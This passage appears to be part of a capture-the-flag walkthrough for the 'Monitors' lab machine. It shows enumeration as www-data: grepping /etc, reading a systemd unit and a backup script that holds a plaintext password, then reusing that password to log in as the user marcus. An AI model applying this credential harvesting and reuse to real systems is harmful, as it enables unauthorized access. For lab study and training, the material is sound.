8 manual enum www-data
www-data@monitors:/home/marcus$ ls -la
total 40
drwxr-xr-x 5 marcus marcus 4096 Jan 25 2021 .
drwxr-xr-x 3 root root 4096 Nov 10 2020 ..
d--x--x--x 2 marcus marcus 4096 Nov 10 2020 .backup
lrwxrwxrwx 1 root root 9 Nov 10 2020 .bash_history -> /dev/null
-rw-r--r-- 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwx------ 2 marcus marcus 4096 Jan 25 2021 .cache
drwx------ 3 marcus marcus 4096 Nov 10 2020 .gnupg
-rw-r--r-- 1 marcus marcus 807 Apr 4 2018 .profile
-r--r----- 1 root marcus 84 Jan 25 2021 note.txt
-r--r----- 1 root marcus 33 Oct 5 19:07 user.txt
# backup directory has weird perms
# cant find anything, global search for marcus in files
# narrowed search to /etc/ /tmp /var folders; found this in /etc
www-data@monitors:/$ grep -Rnw /etc -ie marcus --color=always 2>/dev/null
/etc/group-:52:marcus:x:1000:
/etc/subgid:3:marcus:165536:65536
/etc/group:52:marcus:x:1000:
/etc/passwd:29:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:8:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:3:marcus:165536:65536
/etc/passwd-:29:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
Binary file /etc/alternatives/phar.phar matches
Binary file /etc/alternatives/php matches
Binary file /etc/alternatives/phar matches
# there's some cacti-backup.service
www-data@monitors:/$ cat /etc/systemd/system/cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target
[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh
[Install]
WantedBy=multi-user.target
# as www-data we couldn't read /home/marcus/backup dir; tryng to read file
www-data@monitors:/$ cat /home/marcus/.backup/backup.sh
#!/bin/bash
backup_name="cacti_backup"
config_pass="VerticalEdge2020"
zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip
# su to marcus works
| ssh also
$ ssh marcus@monitors.htb
marcus@monitors:~$ whoami;id
marcus
uid=1000(marcus) gid=1000(marcus) groups=1000(marcus)
Last updated